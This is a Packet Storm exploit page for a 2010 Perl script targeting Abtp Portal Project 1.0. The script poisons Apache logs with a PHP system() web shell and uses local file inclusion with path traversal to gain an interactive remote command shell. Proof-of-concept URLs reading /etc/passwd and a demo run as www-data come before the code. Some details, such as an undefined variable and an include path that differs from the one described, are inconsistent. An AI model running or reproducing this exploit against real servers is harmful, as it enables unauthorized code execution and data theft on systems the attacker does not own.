exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Abtp Portal Project 1.0 Local File Inclusion

Abtp Portal Project 1.0 Local File Inclusion
Posted Dec 9, 2010
Authored by Br0ly

Abtp Portal Project versions 1.0 and below suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | a94fc6ada9215af3b9c12b526ca1db6c722c36309ffc963b5185a2dbfcbcb1a5

Abtp Portal Project 1.0 Local File Inclusion

Change Mirror Download
#!/usr/bin/perl

=about
----------------------------------------------------------------------------------------------------

Name : Abtp Portal Project <= 1.0
Site : https://sourceforge.net/projects/abtpportal/
Down : https://sourceforge.net/project/platformdownload.php?group_id=59168

----------------------------------------------------------------------------------------------------


Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

Description:

Bug : Local/Remote File Inclusion

Look this: includes/esqueletos/skel_null.php:1: <? include($ABTPV_BLOQUE_CENTRAL); ?>
The variable $ ABTPV_BLOQUE_CENTRAL was not correctly stated thus enabling the attack include malicious files or read files from the system.

If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;

----------------------------------------------------------------------------------------------------

P0c:

RFI:https://localhost/Scripts/abtpportal0.1.0/includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=[EVIL_CODE]?

LFI:https://localhost/Scripts/abtpportal0.1.0/includes/esqueletos/skel_null.php?ABTPV_BLOQUE_CENTRAL=/etc/passwd

OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------
Exploit Demo:

perl abtpportal.txt https://localhost/Scripts/abtpportal0.1.0

--------------------------------------
- Abtp Portal Project
- RCE Exploit
- by br0ly
--------------------------------------

[*] Injecting evil php code ..
[*] Cheeking for Apache Logs ..
[*] Apache Log Injection completed
[*] Path: /var/log/apache2/access.log
[!] Hi my master, do your job now [;D]

shell[localhost]$> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

----------------------------------------------------------------------------------------------------


Greetz : Osirys.

;D

=cut

use IO::Socket::INET;
use LWP::UserAgent;


my $host = $ARGV[0];
my $lfi_path = "/help.php?module=";
my $gotcha = 0;
my $null = "%00";
my $rand1 = "1337".$rand_a."1337";
my $rand_b = int(rand 150);
my $rand2 = "1337".$rand_b."1337";
my $dir = "../../../../../../../../../..";
my @logs_dirs = qw(
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/access_log
/logs/error.log
/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/etc/httpd/logs/access_log
/usr/local/apache/logs/error_log
/usr/local/apache2/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/access.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache2/logs/error.log
/var/log/error_log
/apache/logs/error.log
/apache/logs/access.log
);

my $php_code = "<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=st".
"ripslashes(\$_GET[cmd]);} system(\$_GET[cmd]);?>";

if (@ARGV < 1) {

&banner();
&help("-1");
}

elsif (cheek($host) == 1) {

&banner();

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

&xploit();
}

else {

&banner();
help("-2");
}


sub xploit () {

$sock = IO::Socket::INET->new(
PeerAddr => $h0st,
PeerPort => 80,
Proto => "tcp"
) || die "Can't connect to $host:80!\n";

print "[*] Injecting evil php code ..\n";

print $sock "GET /br0ly_log_inj start0:".$rand1.$php_code.":0end".$rand2." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print "[*] Cheeking for Apache Logs ..\n";

while (($log = <@logs_dirs>)&&($gotcha != 1)) {

$tmp_path = $host.$lfi_path.$dir.$log.$null;
$re = get_req($tmp_path);

if ($re =~ /br0ly_log_inj/) {

$gotcha = 1;
$log_path = $tmp_path;
print "[*] Apache Log Injection completed\n";
print "[*] Path: $log\n";
print "[!] Hi my master, do your job now [;D]\n\n";
&exec_cmd;
}
}

$gotcha == 1 || die "[-] Couldn't find Apache Logs\n";

}

sub exec_cmd {

$h0st !~ /www\./ || $h0st =~ s/www\.//;
print "shell[$h0st]\$> ";
$cmd = <STDIN>;
$cmd !~ /exit/ || die "[-] Quitting ..\n\n";
$exec_url = $log_path."&cmd=".$cmd;
my $re = get_req($exec_url);
my $content = tag($re);

if ($content =~ m/start0:$rand1(.+)\*:0end$rand2/g) {

my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
chomp($out);
print "$out\n";
&exec_cmd;
}

else {

$c++;
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
&exec_cmd;
}

}


sub get_input() {

my $host = $_[0];
$host =~ /https:\/\/(.*)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return $full_det;
}



sub tag() {

my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}

sub cheek() {

my $host = $_[0];
if ($host =~ /https:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}

sub get_req() {

$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}

sub help() {

my $error = $_[0];
if ($error == -1) {
print "\n[-] Error, missed some arguments !\n\n";
}

elsif ($error == -2) {

print "\n[-] Error, Bad arguments !\n";
}

print "[*] Usage : perl $0 https://localhost//\n\n";
exit(0);
}

sub banner () {
print "\n".
" --------------------------------------\n".
" - Abtp Portal Project \n".
" - RCE Exploit \n".
" - by br0ly \n".
" --------------------------------------\n\n";
}


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close